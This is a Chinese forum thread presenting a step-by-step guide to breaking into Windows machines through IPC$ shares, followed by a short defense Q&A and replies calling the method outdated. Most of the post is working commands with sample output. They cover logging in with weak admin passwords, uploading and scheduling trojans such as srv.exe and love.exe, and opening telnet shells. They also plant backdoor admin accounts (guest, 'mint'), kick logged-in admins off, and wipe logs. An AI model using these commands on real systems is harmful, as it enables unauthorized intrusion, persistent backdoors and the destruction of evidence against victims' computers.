1   1  /  1  页   跳转

DOS入侵示例

DOS入侵示例

DOS入侵示例
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)
  1. C:\>net use [url=file://\\127.0.0.1\IPC$]\\127.0.0.1\IPC$[/url] "密码" /user:"用户名"
  一般用流光,通过扫描弱口令来得到,管理员帐号和密码.
  2. C:\>copy srv.exe [url=file://\\127.0.0.1\admin$]\\127.0.0.1\admin$[/url]
  先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思
是C盘与D盘,这看你要复制到什么地方去了)。
    
  3. C:\>net time [url=file://\\127.0.0.1]\\127.0.0.1[/url]
  查查时间,发现127.0.0.1 的当前时间是 2004/6/15 上午 11:00,命令成功完成。
    
  4. C:\>at [url=file://\\127.0.0.1]\\127.0.0.1[/url] 11:05 srv.exe
  用at命令启动srv.exe吧
  5. C:\>net time [url=file://\\127.0.0.1]\\127.0.0.1[/url]
  再查查到时间没有?如果127.0.0.1 的当前时间是 2004/6/15 上午 11:05,那就准备开始下面的命令。
    
  6. C:\>telnet 127.0.0.1 99
  这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端
口的Shell。
  虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm

    
  7.C:\>copy ntlm.exe [url=file://\\127.0.0.1\admin$]\\127.0.0.1\admin$[/url]
  用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
    
  8. C:\WINNT\system32>ntlm
  输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出
现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
  9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做
什么吧,哈哈)
  为了以防万一,我们再把guest激活加到管理组
  10. C:\>net user guest /active:yes
  将对方的Guest用户激活
  11. C:\>net user guest 1234
  将Guest的密码改为1234,或者你要设定的密码
  12. C:\>net localgroup administrators guest /add
  将Guest变为Administrator(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算
  13.使用nb2的sql工具。远程执行dos命令
  net start telnet 开telnet服务
  net user mint mint /add 添加用户mint密码为mint
  net localgroup administrators mint /add 将帐号mint升级为管理员
  7,使用3389登陆。发现登陆用户已满。不用怕。我们把他踢出去。
  8,telnet对方ip。发现需要NTLM 身份验证。怎么办?放弃不是黑客的追求。
  9,我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。
  10,找到c:\winnt\system32\cmd.exe 建立一个快捷方式到桌面。
  11,修改cmd的快捷方式属性为允许其他身份登陆。
  12,然后运行桌面上的cmd.exe的快捷方式。输入帐号mint密码mint
  13,telnet对方ip.直接可以登陆对方电脑了。
  使用命令
  c:\query user 查看对方目前终端登陆状况。
  运行命令
  c:\logoff 1 踢出去一个管理者
  再用c:\query user检查一便~~
  ok了
  14,使用3389远程终端登陆。
  入侵中可能会用到的相关命令
  请注意命令适用于本地还是远程,如果适用于本地,你只能在获得远程主机的shell后,才能向远程主机执行。
  1 建立空连接:
  net use [url=file://\\IP\ipc$]\\IP\ipc$[/url] "" /user:""
  2 建立非空连接:
  net use [url=file://\\IP\ipc$]\\IP\ipc$[/url] "psw" /user:"account"
  3 查看远程主机的共享资源(但看不到默认共享)
  net view [url=file://\\IP]\\IP[/url]
  4 查看本地主机的共享资源(可以看到本地的默认共享)
  net share
  5 得到远程主机的用户名列表
  nbtstat -A IP
  6 得到本地主机的用户列表
  net user
  7 查看远程主机的当前时间
  net time [url=file://\\IP]\\IP[/url]
  8 显示本地主机当前服务
  net start
  9 启动/关闭本地服务
  net start 服务名 /y
  net stop 服务名 /y
  10 映射远程共享:
  net use z: [url=file://\\IP\baby]\\IP\baby[/url]
  此命令将共享名为baby的共享资源映射到z盘
  11 删除共享映射
  net use c: /del 删除映射的c盘,其他盘类推
  net use * /del /y删除全部
  12 向远程主机复制文件
  copy \路径\srv.exe [url=file://\\IP\]\\IP\[/url]共享目录名,如:
  copy ccbirds.exe [url=file://\\*.*.*.*\c]\\*.*.*.*\c[/url] 即将当前目录下的文件复制到对方c盘内
  13 远程添加计划任务
  at [url=file://\\ip]\\ip[/url] 时间 程序名,如:
  at [url=file://\\127.0.0.0]\\127.0.0.0[/url] 11:00 love.exe
  注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径
  14 开启远程主机的telnet
  这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且还需要满足四个要求:
  1)目标开启了ipc$共享
  2)你要拥有管理员密码和帐号
  3)目标开启RemoteRegistry服务,用户就该ntlm认证
  4)对WIN2K/XP有效,NT未经测试
  命令格式:OpenTelnet.exe [url=file://\\server]\\server[/url] account psw NTLM认证方式 port
  试例如下:c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90
  15 激活用户/加入管理员组
  1 net uesr account /active:yes
  2 net localgroup administrators account /add
  16 关闭远程主机的telnet
  同样需要一个小程序:ResumeTelnet.exe
  命令格式:ResumeTelnet.exe [url=file://\\server]\\server[/url] account psw
  试例如下:c:\>ResumeTelnet.exe \\*.*.*.* administrator ""
  17 删除一个已建立的ipc$连接
  net use [url=file://\\IP\ipc$]\\IP\ipc$[/url] /del
  (本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创http://ccbirds.yeah.net
  十二 ipc$完整入侵步骤祥解
  其实入侵步骤随个人爱好有所不同,我就说一下常见的吧,呵呵,献丑了!
  1 用扫描软件搜寻存在若口令的主机,比如流光,SSS,X-scan等,随你的便,然后锁定目标,如果扫到了管理员权限的口令,
你可以进行下面的步骤了,假设你现在得到了administrator的密码为空
  2 此时您有两条路可以选择:要么给对方开telnet(命令行),要么给它传木马(图形界面),那我们就先走telnet这条路吧
  3上面开telnet的命令没忘吧,要用到opentelnet这个小程序
  c:\>OpenTelnet.exe [url=file://\\192.168.21]\\192.168.21[/url].* administrator "" 1 90
  如果返回如下信息
  *******************************************************
  Remote Telnet Configure, by refdom
  Email: refdom@263.net
  OpenTelnet.exe
  UsagepenTelnet.exe [url=file://\\server]\\server[/url] username password NTLMAuthor telnetport
  *******************************************************
  Connecting [url=file://\\192.168.21.*...Successfully]\\192.168.21.*...Successfully[/url]!
  NOTICE!!!!!!
  The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23
  Starting telnet service...
  telnet service is started successfully! telnet service is running!
  BINGLE!!!Yeah!!
  Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
  Disconnecting server...Successfully!
  *说明你已经打开了一个端口90的telnet。
  4 现在我们telnet上去
  telnet 192.168.21.* 90
  如果成功,你将获得远程主机的一个shell,此时你可以像控制自己的机器一样控制你的肉鸡了,那么做点什么呢?把guest激活
再加入管理组吧,就算留个后门了
  5 C:\>net user guest /active:yes
  *将Guest用户激活,也有可能人家的guest本来就试活的,你可以用net user guest看一下它的帐户启用的值是yes还是no
  6 C:\>net user guest 1234
  *将Guest的密码改为1234,或者改成你喜欢的密码
  7 C:\>net localgroup administrators guest /add
  *将Guest变为Administrator,这样,即使以后管理员更改了他的密码,我们也可以用guest登录了,不过也要提醒您,因为通过
安全策略的设置,可以禁止guest等帐户的远程访问,呵呵,如果真是这样,那我们的后门也就白做了,愿上帝保佑Guest。
  8 好了,现在我们来走另一条路,给它传个木马玩玩
  9 首先,我们先建立起ipc$连接
  C:\>net use [url=file://\\192.168.21.*\ipc$]\\192.168.21.*\ipc$[/url] "" /user:administrator
  10 既然要上传东西,就要先知道它开了什么共享
  C:\>net view [url=file://\\192.168.21]\\192.168.21[/url].*
  在 [url=file://\\192.168.21]\\192.168.21[/url].*的共享资源
  资源共享名 类型 用途 注释
  -----------------------------------------------------------
  C Disk
  D Disk
  命令成功完成。
  *好了,我们看到对方共享了C,D两个盘,我们下面就可以向任意一个盘复制文件了。再次声明,因为用net view命令无法看到默
认共享,因此通过上面返回的结果,我们并不能判断对方是否开启了默认共享。
  11 C:\>copy love.exe [url=file://\\192.168.21.*\c]\\192.168.21.*\c[/url]
  已复制 1 个文件
  *用这个命令你可以将木马客户端love.exe传到对方的c盘下,当然,如果能复制到系统文件夹下是最好的了,不容易被发现
  12 运行木马前,我们先看看它现在的时间
  net time [url=file://\\192.168.21]\\192.168.21[/url].*
  [url=file://\\192.168.21]\\192.168.21[/url].*的当前时间是 2003/8/22 上午 11:00
  命令成功完成
  13 现在我们用at运行它吧,不过对方一定要开了Task Scheduler服务(允许程序在指定时间运行),否则就不行了
  C:\>at [url=file://\\192.168.21]\\192.168.21[/url].* 11:02 c:\love.exe
  新加了一项作业,其作业 ID = 1
  14 剩下就是等了,等过了11:02,你就可以用控制端去连接了,如果成功你将可以用图形界面去控制远程主机了,如果连接失败
,那么它可能在局域网里,也可能程序被防火墙杀了,还可能它下线了(没这么巧吧),无论哪种情况你只好放弃了
  嗯,好了,两种基本方法都讲了。如果你对上面的操作已经轻车熟路了,也可以用更高效的套路,比如用CA克隆guest,用
psexec执行木马,用命令:psexec [url=file://\\tergetIP]\\tergetIP[/url] -u user -p paswd cmd.exe直接获得shell等,这些都是可以得,随你的便。不过最
后不要忘了把日志清理干净,可以用榕哥的elsave.exe。
  讲了ipc$的入侵,就不能不说如何防范,那么具体要怎样做呢?看下面
  1,怎样建立空连接,它有什么用?
  答:使用命令 net use \IPipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。
  对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注册表等,没有什么
利用价值。对2000作用就更小了。而且实现也不方便,需借助工具。
  2.为什么我连不上IPC$?
  答:1.只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。
  2.确认你的命令没有打错。正确的命令是: net use \目标IPipc$ "密码" /user:"用户名"
  注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。
  3,根据返回的错误号分析原因:
  错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
  错误号51,Windows 无法找到网络路径 : 网络有问题;
  错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
  错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
  错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
  错误号1326,未知的用户名或错误密码 : 原因很明显了;
  错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
  错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
  4,关于ipc$连不上的问题比较复杂,没有总结出一个统一的认识,在肉鸡上实验有时会得出矛盾的结论,十分棘手。 而且知道
了问题所在,如果没有用其他办法获得shell,很多问题依然不能解决。
  5,怎样打开目标的IPC$?
  答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。当然,这shell必须是admin权限的。然后
你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道,ipc$能否使用还有很多条件。请确认相关服
务都已运行,没有就启动它(不知道怎么做的请看net命令的用法)。还是不行的话(比如有防火墙,杀不了)建议放弃。
  6,怎样映射和访问默认共享?
  答:使用命令 net use z: \目标IPc$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘,其他盘类推。
  如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy muma.exe \IPd$pathmuma.exe 。或者再R射也可以,
只是不用用户名和密码了:net use y: \IPd$ 。然后 copy muma.exe y:pathmuma.exe 。当路径中包含空格时,须用""将路径全引
住。
  7,如何删除映射和ipc$连接?
  答:用命令 net use \IPipc$ /del 删除和一个目标的ipc$连接。
  用命令 net use z: /del 删除映射的z盘,其他盘类推。
  用命令 net use * /del 删除全部。会有提示要求按y确认。
  8,连上ipc$然后我能做什么?
  答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工
具(比如pstools系列、Win2000SrvReskit、telnethack等)获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享(
没开你就帮他开),你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具(木马)还具有
直接控屏的功能。如果是2000server,还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关教程。
  9,怎样防止别人用ips$和默认共享入侵我?
  答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。
  1,先把已有的删除
  net share ipc$ /del
  net share admin$ /del
  net share c$ /del
  …………(有几个删几个)
  2,禁止别人空连接
    首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous
(DWORD)的键值改为:00000002。
    3,禁止自动打开默认共享
    对于server版,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把
AutoShareServer(DWORD)的键值改为:00000000。
  对于pro版,则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks(DWORD)
的键值改为:00000000。
  如果上面所说的主键不存在,就新建一个再改键值。
  B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)
  net stop lanmanserver
  可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。
  C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵提供方便。
  D、还有一个办法就是装防火墙,或者端口过滤。
  结束进程:ntsd -c q -p PID

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
分享到:
gototop
 

回复:DOS入侵示例

攻击讲原理及防范就好~~~~~过程太具体的话。。。。
愛情是物質打造的華麗`而不是言語創造的美麗`
gototop
 

回复:DOS入侵示例

指出一错误
net share ipc$ /del
IPC $是删不掉的
gototop
 

回复:DOS入侵示例

现在哪还有通过IPC$攻击的
有个防火墙就过不去
就算没防火墙 被控制是仅来宾也过不去
再说还要知道 密码
总之麻烦的攻击方法没人去用了
gototop
 

回复:DOS入侵示例

现在要是能用这种方法入侵,我拜您为师
gototop
 

回复:DOS入侵示例

不想做黑客更不想去攻击人
gototop
 

回复:DOS入侵示例

黑客不是攻击者.请说清楚.我们只是爱好钻研计算机技术
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT